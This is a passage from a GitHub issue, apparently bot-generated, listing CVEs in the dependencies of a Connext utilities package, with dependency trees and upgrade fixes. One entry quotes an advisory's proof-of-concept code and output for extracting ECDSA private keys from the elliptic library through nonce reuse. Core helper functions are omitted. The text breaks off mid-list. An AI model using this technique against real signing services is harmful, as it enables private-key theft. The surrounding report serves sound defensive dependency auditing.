Skip to content

nxtp-utils-2.5.0-alpha.8.tgz: 62 vulnerabilities (highest severity is: 10.0) [main] (unreachable) #120

New issue
New issue
Open
Open
nxtp-utils-2.5.0-alpha.8.tgz: 62 vulnerabilities (highest severity is: 10.0) [main] (unreachable)#120
@renovate

Description

@renovate
renovate
bot
opened on Oct 20, 2025
📂 Vulnerable Library - nxtp-utils-2.5.0-alpha.8.tgz

Common utilities for use within the @connext/nxtp-* packages

Path to dependency file: /package.json

Path to vulnerable library: /packages/utils/package.json

Partial results (27 findings) are displayed below due to a content size limitation in GitHub. To view information on the remaining findings, navigate to the Mend Application.

Findings

Finding Severity 🎯 CVSS Exploit Maturity EPSS Library Type Fixed in Remediation Available Reachability
CVE-2025-6545 🟣 Critical 10.0 Not Defined < 1% pbkdf2-3.1.2.tgz Transitive N/A Unreachable
CVE-2023-46233 🟣 Critical 9.1 Not Defined < 1% crypto-js-3.3.0.tgz Transitive N/A Unreachable
CVE-2024-48949 🟣 Critical 9.1 Not Defined < 1% elliptic-6.5.5.tgz Transitive N/A Unreachable
CVE-2026-23950 🔴 High 8.8 Not Defined < 1% tar-4.4.19.tgz Transitive N/A Unreachable
CVE-2026-23950 🔴 High 8.8 Not Defined < 1% tar-6.2.0.tgz Transitive N/A Unreachable
CVE-2025-7783 🔴 High 8.7 Not Defined < 1% form-data-2.3.3.tgz Transitive N/A Unreachable
CVE-2025-9287 🔴 High 8.7 Not Defined < 1% cipher-base-1.0.4.tgz Transitive N/A Unreachable
CVE-2025-9288 🔴 High 8.7 Not Defined < 1% sha.js-2.4.11.tgz Transitive N/A Unreachable
WS-2025-0006 🔴 High 8.6 N/A N/A elliptic-6.5.5.tgz Transitive N/A Unreachable
CVE-2026-24842 🔴 High 8.2 Not Defined < 1% tar-6.2.0.tgz Transitive N/A Unreachable
CVE-2026-24842 🔴 High 8.2 Not Defined < 1% tar-4.4.19.tgz Transitive N/A Unreachable
CVE-2024-21505 🔴 High 7.5 Proof of concept < 1% web3-utils-1.10.4.tgz Transitive N/A Unreachable
CVE-2024-21538 🔴 High 7.5 Proof of concept < 1% cross-spawn-7.0.3.tgz Transitive N/A Unreachable
CVE-2024-37890 🔴 High 7.5 Not Defined < 1% ws-3.3.3.tgz Transitive N/A Unreachable
CVE-2024-45296 🔴 High 7.5 Not Defined < 1% path-to-regexp-0.1.7.tgz Transitive N/A Unreachable
CVE-2024-45590 🔴 High 7.5 Not Defined 1.5% body-parser-1.20.2.tgz Transitive N/A Unreachable
CVE-2024-48930 🔴 High 7.5 Not Defined < 1% secp256k1-4.0.3.tgz Transitive N/A Unreachable
CVE-2024-52798 🔴 High 7.5 Not Defined < 1% path-to-regexp-0.1.7.tgz Transitive N/A Unreachable
CVE-2025-27152 🔴 High 7.5 Not Defined < 1% axios-1.3.3.tgz Transitive N/A Unreachable
CVE-2025-27611 🔴 High 7.5 Not Defined < 1% base-x-3.0.9.tgz Transitive N/A Unreachable
CVE-2025-57330 🔴 High 7.5 Not Defined < 1% web3-core-subscriptions-1.10.4.tgz Transitive N/A Unreachable
CVE-2025-58754 🔴 High 7.5 Not Defined < 1% axios-1.3.3.tgz Transitive N/A Unreachable
CVE-2025-64756 🔴 High 7.5 Not Defined < 1% glob-10.3.10.tgz Transitive N/A Unreachable
CVE-2026-25639 🔴 High 7.5 Not Defined < 1% axios-1.3.3.tgz Transitive N/A Unreachable
CVE-2026-26996 🔴 High 7.5 Not Defined < 1% minimatch-9.0.3.tgz Transitive N/A Unreachable
CVE-2026-27903 🔴 High 7.5 Not Defined < 1% minimatch-9.0.3.tgz Transitive N/A Unreachable
CVE-2026-27904 🔴 High 7.5 Not Defined < 1% minimatch-9.0.3.tgz Transitive N/A Unreachable

Details

🟣CVE-2025-6545

Vulnerable Library - pbkdf2-3.1.2.tgz

This library provides the functionality of PBKDF2 with the ability to use any supported hashing algorithm returned from crypto.getHashes()

Library home page: https://registry.npmjs.org/pbkdf2/-/pbkdf2-3.1.2.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • maticjs-3.8.2.tgz
      • ethereumjs-util-7.1.5.tgz
        • ethereum-cryptography-0.1.3.tgz
          • pbkdf2-3.1.2.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

Improper Input Validation vulnerability in pbkdf2 allows Signature Spoofing by Improper Validation. This vulnerability is associated with program files lib/to-buffer.Js.
This issue affects pbkdf2: from 3.0.10 through 3.1.2.
Mend Note: The description of this vulnerability differs from MITRE.

Publish Date: Jun 23, 2025 06:41 PM

URL: CVE-2025-6545

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 10.0

Suggested Fix

Type: Upgrade version

Origin: GHSA-h7cp-r72f-jxh6

Release Date: Jun 23, 2025 06:41 PM

Fix Resolution : pbkdf2 - 3.1.3,https://github.com/browserify/pbkdf2.git - v3.1.3

🟣CVE-2023-46233

Vulnerable Library - crypto-js-3.3.0.tgz

JavaScript library of crypto standards.

Library home page: https://registry.npmjs.org/crypto-js/-/crypto-js-3.3.0.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • merkletreejs-0.3.9.tgz
      • crypto-js-3.3.0.tgz (Vulnerable Library)

  • @connext/lighthouse-2.0.0.tgz (Root Library)

    • sdk-1.0.0.tgz
      • merkletreejs-0.2.32.tgz
        • crypto-js-3.3.0.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

crypto-js is a JavaScript library of crypto standards. Prior to version 4.2.0, crypto-js PBKDF2 is 1,000 times weaker than originally specified in 1993, and at least 1,300,000 times weaker than current industry standard. This is because it both defaults to SHA1, a cryptographic hash algorithm considered insecure since at least 2005, and defaults to one single iteration, a 'strength' or 'difficulty' value specified at 1,000 when specified in 1993. PBKDF2 relies on iteration count as a countermeasure to preimage and collision attacks. If used to protect passwords, the impact is high. If used to generate signatures, the impact is high. Version 4.2.0 contains a patch for this issue. As a workaround, configure crypto-js to use SHA256 with at least 250,000 iterations.

Publish Date: Oct 25, 2023 08:49 PM

URL: CVE-2023-46233

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 9.1

Suggested Fix

Type: Upgrade version

Origin: https://www.cve.org/CVERecord?id=CVE-2023-46233

Release Date: Oct 25, 2023 08:49 PM

Fix Resolution : crypto-js - 4.2.0

🟣CVE-2024-48949

Vulnerable Library - elliptic-6.5.5.tgz

Library home page: https://registry.npmjs.org/elliptic/-/elliptic-6.5.5.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-bzz-1.10.4.tgz
          • swarm-js-0.1.42.tgz
            • eth-lib-0.1.29.tgz
              • elliptic-6.5.5.tgz (Vulnerable Library)

  • @connext/bridge-reference-0.0.1.tgz (Root Library)

    • wallet-sdk-3.5.4.tgz
      • eth-json-rpc-filters-4.2.2.tgz
        • eth-json-rpc-middleware-6.0.0.tgz
          • ethereumjs-util-5.2.1.tgz
            • elliptic-6.5.5.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

The verify function in lib/elliptic/eddsa/index.js in the Elliptic package before 6.5.6 for Node.js omits "sig.S().gte(sig.eddsa.curve.n) || sig.S().isNeg()" validation.

Publish Date: Oct 10, 2024 12:00 AM

URL: CVE-2024-48949

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 9.1

Suggested Fix

Type: Upgrade version

Origin: https://www.cve.org/CVERecord?id=CVE-2024-48949

Release Date: Oct 10, 2024 12:00 AM

Fix Resolution : elliptic - 6.5.6

🔴CVE-2026-23950

Vulnerable Library - tar-4.4.19.tgz

tar for node

Library home page: https://registry.npmjs.org/tar/-/tar-4.4.19.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-bzz-1.10.4.tgz
          • swarm-js-0.1.42.tgz
            • tar-4.4.19.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the "path-reservations" system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., "ß" and "ss"), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a "PathReservations" system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using "NFD" Unicode normalization (in which "ß" and "ss" are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which "ß" causes an inode collision with "ss")). This enables an attacker to circumvent internal parallelization locks ("PathReservations") using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates "path-reservations.js" to use a normalization form that matches the target filesystem's behavior (e.g., "NFKD"), followed by first "toLocaleLowerCase('en')" and then "toLocaleUpperCase('en')". As a workaround, users who cannot upgrade promptly, and who are programmatically using "node-tar" to extract arbitrary tarball data should filter out all "SymbolicLink" entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.

Publish Date: Jan 20, 2026 12:40 AM

URL: CVE-2026-23950

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 8.8

Suggested Fix

Type: Upgrade version

Origin: GHSA-r6q2-hw4h-h46w

Release Date: Jan 20, 2026 12:40 AM

Fix Resolution : https://github.com/isaacs/node-tar.git - v7.5.4,tar - 7.5.4

🔴CVE-2026-23950

Vulnerable Library - tar-6.2.0.tgz

Library home page: https://registry.npmjs.org/tar/-/tar-6.2.0.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • secp256k1-4.0.3.tgz
      • node-gyp-10.0.1.tgz
        • make-fetch-happen-13.0.0.tgz
          • cacache-18.0.2.tgz
            • tar-6.2.0.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the "path-reservations" system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., "ß" and "ss"), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a "PathReservations" system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using "NFD" Unicode normalization (in which "ß" and "ss" are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which "ß" causes an inode collision with "ss")). This enables an attacker to circumvent internal parallelization locks ("PathReservations") using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates "path-reservations.js" to use a normalization form that matches the target filesystem's behavior (e.g., "NFKD"), followed by first "toLocaleLowerCase('en')" and then "toLocaleUpperCase('en')". As a workaround, users who cannot upgrade promptly, and who are programmatically using "node-tar" to extract arbitrary tarball data should filter out all "SymbolicLink" entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.

Publish Date: Jan 20, 2026 12:40 AM

URL: CVE-2026-23950

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 8.8

Suggested Fix

Type: Upgrade version

Origin: GHSA-r6q2-hw4h-h46w

Release Date: Jan 20, 2026 12:40 AM

Fix Resolution : https://github.com/isaacs/node-tar.git - v7.5.4,tar - 7.5.4

🔴CVE-2025-7783

Vulnerable Library - form-data-2.3.3.tgz

A library to create readable "multipart/form-data" streams. Can be used to submit forms and file uploads to other web applications.

Library home page: https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-bzz-1.10.4.tgz
          • swarm-js-0.1.42.tgz
            • eth-lib-0.1.29.tgz
              • servify-0.1.12.tgz
                • request-2.88.2.tgz
                  • form-data-2.3.3.tgz (Vulnerable Library)

  • @connext/bridge-reference-0.0.1.tgz (Root Library)

    • web3-provider-1.8.0.tgz
      • web3-provider-engine-16.0.1.tgz
        • request-2.88.2.tgz
          • form-data-2.3.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

Use of Insufficiently Random Values vulnerability in form-data allows HTTP Parameter Pollution (HPP). This vulnerability is associated with program files lib/form_data.Js.
This issue affects form-data: < 2.5.4, 3.0.0 - 3.0.3, 4.0.0 - 4.0.3.
Mend Note: The description of this vulnerability differs from MITRE.

Publish Date: Jul 18, 2025 04:34 PM

URL: CVE-2025-7783

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 8.7

Suggested Fix

Type: Upgrade version

Origin: GHSA-fjxv-7rqg-78g4

Release Date: Jul 18, 2025 04:34 PM

Fix Resolution : form-data - 2.5.4,form-data - 3.0.4,https://github.com/form-data/form-data.git - v2.5.4,form-data - 4.0.4,https://github.com/form-data/form-data.git - v4.0.4,https://github.com/form-data/form-data.git - v3.0.4

🔴CVE-2025-9287

Vulnerable Library - cipher-base-1.0.4.tgz

abstract base class for crypto-streams

Library home page: https://registry.npmjs.org/cipher-base/-/cipher-base-1.0.4.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • maticjs-3.8.2.tgz
      • ethereumjs-util-7.1.5.tgz
        • create-hash-1.2.0.tgz
          • cipher-base-1.0.4.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.This issue affects cipher-base: through 1.0.4.

Publish Date: Aug 20, 2025 09:43 PM

URL: CVE-2025-9287

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 8.7

Suggested Fix

Type: Upgrade version

Origin: GHSA-cpq7-6gpm-g9rc

Release Date: Aug 20, 2025 09:43 PM

Fix Resolution : cipher-base - 1.0.4

🔴CVE-2025-9288

Vulnerable Library - sha.js-2.4.11.tgz

Streamable SHA hashes in pure javascript

Library home page: https://registry.npmjs.org/sha.js/-/sha.js-2.4.11.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • maticjs-3.8.2.tgz
      • ethereumjs-util-7.1.5.tgz
        • create-hash-1.2.0.tgz
          • sha.js-2.4.11.tgz (Vulnerable Library)

  • @connext/bridge-reference-0.0.1.tgz (Root Library)

    • wallet-sdk-3.5.4.tgz
      • sha.js-2.4.11.tgz (Vulnerable Library)

  • @connext/lighthouse-2.0.0.tgz (Root Library)

    • linea-sdk-0.3.0.tgz
      • typeorm-0.3.20.tgz
        • sha.js-2.4.11.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

Improper Input Validation vulnerability in sha.js allows Input Data Manipulation.This issue affects sha.js: through 2.4.11.

Publish Date: Aug 20, 2025 09:59 PM

URL: CVE-2025-9288

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 8.7

Suggested Fix

Type: Upgrade version

Origin: browserify/sha.js@f2a258e

Release Date: Aug 20, 2025 09:59 PM

Fix Resolution : https://github.com/browserify/sha.js.git - v2.4.12,sha.js - 2.4.12

🔴WS-2025-0006

Vulnerable Library - elliptic-6.5.5.tgz

Library home page: https://registry.npmjs.org/elliptic/-/elliptic-6.5.5.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-bzz-1.10.4.tgz
          • swarm-js-0.1.42.tgz
            • eth-lib-0.1.29.tgz
              • elliptic-6.5.5.tgz (Vulnerable Library)

  • @connext/bridge-reference-0.0.1.tgz (Root Library)

    • wallet-sdk-3.5.4.tgz
      • eth-json-rpc-filters-4.2.2.tgz
        • eth-json-rpc-middleware-6.0.0.tgz
          • ethereumjs-util-5.2.1.tgz
            • elliptic-6.5.5.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

Summary Private key can be extracted from ECDSA signature upon signing a malformed input (e.g. a string or a number), which could e.g. come from JSON network input Note that "elliptic" by design accepts hex strings as one of the possible input types Details In this code: https://github.com/indutny/elliptic/blob/3e46a48fdd2ef2f89593e5e058d85530578c9761/lib/elliptic/ec/index.js#L100-L107 "msg" is a BN instance after conversion, but "nonce" is an array, and different BN instances could generate equivalent arrays after conversion. Meaning that a same "nonce" could be generated for different messages used in signing process, leading to "k" reuse, leading to private key extraction from a pair of signatures Such a message can be constructed for any already known message/signature pair, meaning that the attack needs only a single malicious message being signed for a full key extraction While signing unverified attacker-controlled messages would be problematic itself (and exploitation of this needs such a scenario), signing a single message still should not leak the private key Also, message validation could have the same bug (out of scope for this report, but could be possible in some situations), which makes this attack more likely when used in a chain PoC "k" reuse example import elliptic from 'elliptic' const { ec: EC } = elliptic const privateKey = crypto.getRandomValues(new Uint8Array(32)) const curve = 'ed25519' // or any other curve, e.g. secp256k1 const ec = new EC(curve) const prettyprint = ({ r, s }) => "r: ${r}, s: ${s}" const sig0 = prettyprint(ec.sign(Buffer.alloc(32, 1), privateKey)) // array of ones const sig1 = prettyprint(ec.sign('01'.repeat(32), privateKey)) // same message in hex form const sig2 = prettyprint(ec.sign('-' + '01'.repeat(32), privateKey)) // same "r", different "s" console.log({ sig0, sig1, sig2 }) Full attack This doesn't include code for generation/recovery on a purpose (bit it's rather trivial) import elliptic from 'elliptic' const { ec: EC } = elliptic const privateKey = crypto.getRandomValues(new Uint8Array(32)) const curve = 'secp256k1' // or any other curve, e.g. ed25519 const ec = new EC(curve) // Any message, e.g. previously known signature const msg0 = crypto.getRandomValues(new Uint8Array(32)) const sig0 = ec.sign(msg0, privateKey) // Attack const msg1 = funny(msg0) // this is a string here, but can also be of other non-Uint8Array types const sig1 = ec.sign(msg1, privateKey) const something = extract(msg0, sig0, sig1, curve) console.log('Curve:', curve) console.log('Typeof:', typeof msg1) console.log('Keys equal?', Buffer.from(privateKey).toString('hex') === something) const rnd = crypto.getRandomValues(new Uint8Array(32)) const st = (x) => JSON.stringify(x) console.log('Keys equivalent?', st(ec.sign(rnd, something).toDER()) === st(ec.sign(rnd, privateKey).toDER())) console.log('Orig key:', Buffer.from(privateKey).toString('hex')) console.log('Restored:', something) Output: Curve: secp256k1 Typeof: string Keys equal? true Keys equivalent? true Orig key: c7870f7eb3e8fd5155d5c8cdfca61aa993eed1fbe5b41feef69a68303248c22a Restored: c7870f7eb3e8fd5155d5c8cdfca61aa993eed1fbe5b41feef69a68303248c22a Similar for "ed25519", but due to low "n", the key might not match precisely but is nevertheless equivalent for signing: Curve: ed25519 Typeof: string Keys equal? false Keys equivalent? true Orig key: f1ce0e4395592f4de24f6423099e022925ad5d2d7039b614aaffdbb194a0d189 Restored: 01ce0e4395592f4de24f6423099e0227ec9cb921e3b7858581ec0d26223966a6 "restored" is equal to "orig" mod "N". Impact Full private key extraction when signing a single malicious message (that passes "JSON.stringify"/"JSON.parse")

Publish Date: Feb 11, 2025 10:00 PM

URL: WS-2025-0006

Threat Assessment

Exploit Maturity:N/A

EPSS:N/A

Score: 8.6

Suggested Fix

Type: Upgrade version

Origin: GHSA-vjh7-7g9h-fjfh

Release Date: Feb 11, 2025 10:00 PM

Fix Resolution : elliptic - 6.6.1,elliptic - 6.6.1

🔴CVE-2026-24842

Vulnerable Library - tar-6.2.0.tgz

Library home page: https://registry.npmjs.org/tar/-/tar-6.2.0.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • secp256k1-4.0.3.tgz
      • node-gyp-10.0.1.tgz
        • make-fetch-happen-13.0.0.tgz
          • cacache-18.0.2.tgz
            • tar-6.2.0.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.

Publish Date: Jan 28, 2026 12:20 AM

URL: CVE-2026-24842

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 8.2

Suggested Fix

Type: Upgrade version

Origin: isaacs/node-tar@f4a7aa9

Release Date: Jan 28, 2026 12:20 AM

Fix Resolution : tar - 7.5.7,https://github.com/isaacs/node-tar.git - v7.5.7

🔴CVE-2026-24842

Vulnerable Library - tar-4.4.19.tgz

tar for node

Library home page: https://registry.npmjs.org/tar/-/tar-4.4.19.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-bzz-1.10.4.tgz
          • swarm-js-0.1.42.tgz
            • tar-4.4.19.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.

Publish Date: Jan 28, 2026 12:20 AM

URL: CVE-2026-24842

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 8.2

Suggested Fix

Type: Upgrade version

Origin: isaacs/node-tar@f4a7aa9

Release Date: Jan 28, 2026 12:20 AM

Fix Resolution : tar - 7.5.7,https://github.com/isaacs/node-tar.git - v7.5.7

🔴CVE-2024-21505

Vulnerable Library - web3-utils-1.10.4.tgz

Library home page: https://registry.npmjs.org/web3-utils/-/web3-utils-1.10.4.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-net-1.10.4.tgz
          • web3-utils-1.10.4.tgz (Vulnerable Library)

  • chain-abstraction-1.0.4.tgz (Root Library)

    • sdk-1.11.1.tgz
      • cow-sdk-1.0.2-RC.7.tgz
        • paraswap-5.2.0.tgz
          • web3-1.10.4.tgz
            • web3-utils-1.10.4.tgz (Vulnerable Library)

  • @connext/lighthouse-2.0.0.tgz (Root Library)

    • sdk-1.0.0.tgz
      • merkletreejs-0.2.32.tgz
        • web3-utils-1.10.4.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

Versions of the package web3-utils before 4.2.1 are vulnerable to Prototype Pollution via the utility functions format and mergeDeep, due to insecure recursive merge.
An attacker can manipulate an object's prototype, potentially leading to the alteration of the behavior of all objects inheriting from the affected prototype by passing specially crafted input to these functions.

Publish Date: Mar 25, 2024 05:00 AM

URL: CVE-2024-21505

Threat Assessment

Exploit Maturity:Proof of concept

EPSS:< 1%

Score: 7.5

Suggested Fix

Type: Upgrade version

Origin:

Release Date:

Fix Resolution :

🔴CVE-2024-21538

Vulnerable Library - cross-spawn-7.0.3.tgz

Cross platform child_process#spawn and child_process#spawnSync

Library home page: https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • secp256k1-4.0.3.tgz
      • node-gyp-10.0.1.tgz
        • glob-10.3.10.tgz
          • foreground-child-3.1.1.tgz
            • cross-spawn-7.0.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

Versions of the package cross-spawn before 6.0.6, from 7.0.0 and before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.

Publish Date: Nov 08, 2024 05:00 AM

URL: CVE-2024-21538

Threat Assessment

Exploit Maturity:Proof of concept

EPSS:< 1%

Score: 7.5

Suggested Fix

Type: Upgrade version

Origin: https://www.cve.org/CVERecord?id=CVE-2024-21538

Release Date: Nov 08, 2024 05:00 AM

Fix Resolution : cross-spawn - 7.0.5,org.webjars.npm:cross-spawn:6.0.6,https://github.com/moxystudio/node-cross-spawn.git - v6.0.6,https://github.com/moxystudio/node-cross-spawn.git - v7.0.5,cross-spawn - 7.0.5,cross-spawn - 6.0.6

🔴CVE-2024-37890

Vulnerable Library - ws-3.3.3.tgz

Simple to use, blazing fast and thoroughly tested websocket client and server for Node.js

Library home page: https://registry.npmjs.org/ws/-/ws-3.3.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-bzz-1.10.4.tgz
          • swarm-js-0.1.42.tgz
            • eth-lib-0.1.29.tgz
              • ws-3.3.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

ws is an open source WebSocket client and server for Node.js. A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server. The vulnerability was fixed in ws@8.17.1 (e55e510) and backported to ws@7.5.10 (22c2876), ws@6.2.3 (eeb76d3), and ws@5.2.4 (4abd8f6). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent. 2. Set server.maxHeadersCount to 0 so that no limit is applied.

Publish Date: Jun 17, 2024 07:09 PM

URL: CVE-2024-37890

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 7.5

Suggested Fix

Type: Upgrade version

Origin: GHSA-3h5v-q93c-6h6q

Release Date: Jun 17, 2024 07:09 PM

Fix Resolution : ws - 5.2.4,6.2.3,7.5.10,8.17.1

🔴CVE-2024-45296

Vulnerable Library - path-to-regexp-0.1.7.tgz

Express style path to RegExp utility

Library home page: https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-0.1.7.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-bzz-1.10.4.tgz
          • swarm-js-0.1.42.tgz
            • eth-lib-0.1.29.tgz
              • servify-0.1.12.tgz
                • express-4.18.3.tgz
                  • path-to-regexp-0.1.7.tgz (Vulnerable Library)

  • @connext/cartographer-poller-2.0.0.tgz (Root Library)

    • dd-trace-3.13.2.tgz
      • path-to-regexp-0.1.7.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

path-to-regexp turns path strings into a regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a DoS. The bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (.). For users of 0.1, upgrade to 0.1.10. All other users should upgrade to 8.0.0.

Publish Date: Sep 09, 2024 07:07 PM

URL: CVE-2024-45296

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 7.5

Suggested Fix

Type: Upgrade version

Origin: GHSA-9wv6-86v2-598j

Release Date: Sep 09, 2024 07:07 PM

Fix Resolution : path-to-regexp - 0.1.10,1.9.0,3.3.0,6.3.0,8.0.0

🔴CVE-2024-45590

Vulnerable Library - body-parser-1.20.2.tgz

Library home page: https://registry.npmjs.org/body-parser/-/body-parser-1.20.2.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-bzz-1.10.4.tgz
          • swarm-js-0.1.42.tgz
            • eth-lib-0.1.29.tgz
              • servify-0.1.12.tgz
                • express-4.18.3.tgz
                  • body-parser-1.20.2.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

body-parser is Node.js body parsing middleware. body-parser <1.20.3 is vulnerable to denial of service when url encoding is enabled. A malicious actor using a specially crafted payload could flood the server with a large number of requests, resulting in denial of service. This issue is patched in 1.20.3.

Publish Date: Sep 10, 2024 03:54 PM

URL: CVE-2024-45590

Threat Assessment

Exploit Maturity:Not Defined

EPSS:1.5%

Score: 7.5

Suggested Fix

Type: Upgrade version

Origin: GHSA-qwcr-r2fm-qrc7

Release Date: Sep 10, 2024 03:54 PM

Fix Resolution : body-parser - 1.20.3

🔴CVE-2024-48930

Vulnerable Library - secp256k1-4.0.3.tgz

This module provides native bindings to ecdsa secp256k1 functions

Library home page: https://registry.npmjs.org/secp256k1/-/secp256k1-4.0.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • maticjs-3.8.2.tgz
      • ethereumjs-util-7.1.5.tgz
        • ethereum-cryptography-0.1.3.tgz
